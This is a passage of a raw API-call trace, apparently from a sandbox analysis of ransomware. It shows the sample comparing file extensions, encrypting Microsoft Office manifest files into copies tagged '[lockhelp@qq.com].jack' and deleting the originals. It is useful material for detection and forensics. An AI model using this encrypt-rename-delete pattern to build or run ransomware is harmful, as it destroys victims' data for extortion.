[0205.003] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.003] lstrlenW (lpString=".jpg") returned 4 [0205.003] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.003] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString=".doc") returned 4 [0205.004] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString=".docx") returned 5 [0205.004] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.004] lstrlenW (lpString=".pdf") returned 4 [0205.004] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString=".xls") returned 4 [0205.004] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString=".xlsx") returned 5 [0205.004] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.004] lstrlenW (lpString=".ppt") returned 4 [0205.004] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString=".zip") returned 4 [0205.004] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.004] lstrlenW (lpString=".rar") returned 4 [0205.004] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString=".bz2") returned 4 [0205.004] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString=".7z") returned 3 [0205.004] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString=".dbf") returned 4 [0205.004] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString=".1cd") returned 4 [0205.004] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.004] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 104 [0205.004] lstrlenW (lpString=".jpg") returned 4 [0205.004] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.005] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.005] lstrlenW (lpString="AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 53 [0205.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.005] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=2147) returned 1 [0205.005] CloseHandle (hObject=0x3b8) returned 1 [0205.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 0x220 [0205.005] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.005] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.006] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.006] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.006] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x43c [0205.006] GetLastError () returned 0x0 [0205.006] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x863, lpOverlapped=0x0) returned 1 [0205.108] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x870, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x870, lpOverlapped=0x0) returned 1 [0205.109] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.109] WriteFile (in: hFile=0x43c, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.109] SetEndOfFile (hFile=0x43c) returned 1 [0205.204] CloseHandle (hObject=0x43c) returned 1 [0205.207] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.207] SetEndOfFile (hFile=0x3b8) returned 1 [0205.208] CloseHandle (hObject=0x3b8) returned 1 [0205.208] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.208] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 1 [0205.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.209] lstrlenW (lpString=".doc") returned 4 [0205.209] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString=".docx") returned 5 [0205.209] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.209] lstrlenW (lpString=".pdf") returned 4 [0205.209] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString=".xls") returned 4 [0205.209] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString=".xlsx") returned 5 [0205.209] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.209] lstrlenW (lpString=".ppt") returned 4 [0205.209] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.209] lstrlenW (lpString=".zip") returned 4 [0205.209] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.209] lstrlenW (lpString=".rar") returned 4 [0205.209] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString=".bz2") returned 4 [0205.209] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString=".7z") returned 3 [0205.209] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.209] lstrlenW (lpString=".dbf") returned 4 [0205.209] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.209] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.210] lstrlenW (lpString=".1cd") returned 4 [0205.210] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.210] lstrlenW (lpString=".jpg") returned 4 [0205.210] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.210] lstrlenW (lpString=".doc") returned 4 [0205.210] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString=".docx") returned 5 [0205.210] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.210] lstrlenW (lpString=".pdf") returned 4 [0205.210] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString=".xls") returned 4 [0205.210] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString=".xlsx") returned 5 [0205.210] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.210] lstrlenW (lpString=".ppt") returned 4 [0205.210] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.210] lstrlenW (lpString=".zip") returned 4 [0205.210] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.210] lstrlenW (lpString=".rar") returned 4 [0205.210] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString=".bz2") returned 4 [0205.210] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.210] lstrlenW (lpString=".7z") returned 3 [0205.211] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.211] lstrlenW (lpString=".dbf") returned 4 [0205.211] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.211] lstrlenW (lpString=".1cd") returned 4 [0205.211] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.211] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 104 [0205.211] lstrlenW (lpString=".jpg") returned 4 [0205.211] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.211] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.211] lstrlenW (lpString="AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 53 [0205.211] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.212] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=1261) returned 1 [0205.212] CloseHandle (hObject=0x3b8) returned 1 [0205.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.212] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.213] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.213] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.213] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0205.213] GetLastError () returned 0x0 [0205.213] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x4ed, lpOverlapped=0x0) returned 1 [0205.433] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x4f0, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x4f0, lpOverlapped=0x0) returned 1 [0205.434] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.434] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.434] SetEndOfFile (hFile=0x3ec) returned 1 [0205.434] CloseHandle (hObject=0x3ec) returned 1 [0205.436] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.436] SetEndOfFile (hFile=0x3b8) returned 1 [0205.437] CloseHandle (hObject=0x3b8) returned 1 [0205.437] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.437] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 1 [0205.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.438] lstrlenW (lpString=".doc") returned 4 [0205.438] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString=".docx") returned 5 [0205.438] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.438] lstrlenW (lpString=".pdf") returned 4 [0205.438] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString=".xls") returned 4 [0205.438] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString=".xlsx") returned 5 [0205.438] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.438] lstrlenW (lpString=".ppt") returned 4 [0205.438] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.438] lstrlenW (lpString=".zip") returned 4 [0205.438] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.438] lstrlenW (lpString=".rar") returned 4 [0205.438] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString=".bz2") returned 4 [0205.438] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString=".7z") returned 3 [0205.438] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.438] lstrlenW (lpString=".dbf") returned 4 [0205.438] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.438] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString=".1cd") returned 4 [0205.439] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString=".jpg") returned 4 [0205.439] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString=".doc") returned 4 [0205.439] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString=".docx") returned 5 [0205.439] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.439] lstrlenW (lpString=".pdf") returned 4 [0205.439] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString=".xls") returned 4 [0205.439] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString=".xlsx") returned 5 [0205.439] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.439] lstrlenW (lpString=".ppt") returned 4 [0205.439] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString=".zip") returned 4 [0205.439] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.439] lstrlenW (lpString=".rar") returned 4 [0205.439] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString=".bz2") returned 4 [0205.439] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString=".7z") returned 3 [0205.439] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.439] lstrlenW (lpString=".dbf") returned 4 [0205.439] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.439] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.440] lstrlenW (lpString=".1cd") returned 4 [0205.440] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 104 [0205.440] lstrlenW (lpString=".jpg") returned 4 [0205.440] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0205.440] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0205.440] lstrlenW (lpString="AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 53 [0205.440] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.440] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x3b9ff14 | out: lpFileSize=0x3b9ff14*=14913) returned 1 [0205.440] CloseHandle (hObject=0x3b8) returned 1 [0205.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 0x220 [0205.440] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0205.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b8 [0205.441] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.441] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.441] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ec [0205.441] GetLastError () returned 0x0 [0205.441] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x3a41, lpOverlapped=0x0) returned 1 [0205.508] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x3a50, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x3a50, lpOverlapped=0x0) returned 1 [0205.509] ReadFile (in: hFile=0x3b8, lpBuffer=0x466a020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b9fecc, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesRead=0x3b9fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.509] WriteFile (in: hFile=0x3ec, lpBuffer=0x466a020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x3b9fc94, lpOverlapped=0x0 | out: lpBuffer=0x466a020*, lpNumberOfBytesWritten=0x3b9fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.509] SetEndOfFile (hFile=0x3ec) returned 1 [0205.509] CloseHandle (hObject=0x3ec) returned 1 [0205.510] SetFilePointerEx (in: hFile=0x3b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b9fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.510] SetEndOfFile (hFile=0x3b8) returned 1 [0205.511] CloseHandle (hObject=0x3b8) returned 1 [0205.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.512] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 1 [0205.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.512] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 104 [0205.512] lstrlenW (lpString=".doc") returned 4 [0205.512] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.512] lstrlenW (lpString=".docx") returned 5 [0205.512] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.512] lstrlenW (lpString=".pdf") returned 4 [0205.512] lstrcmpiW 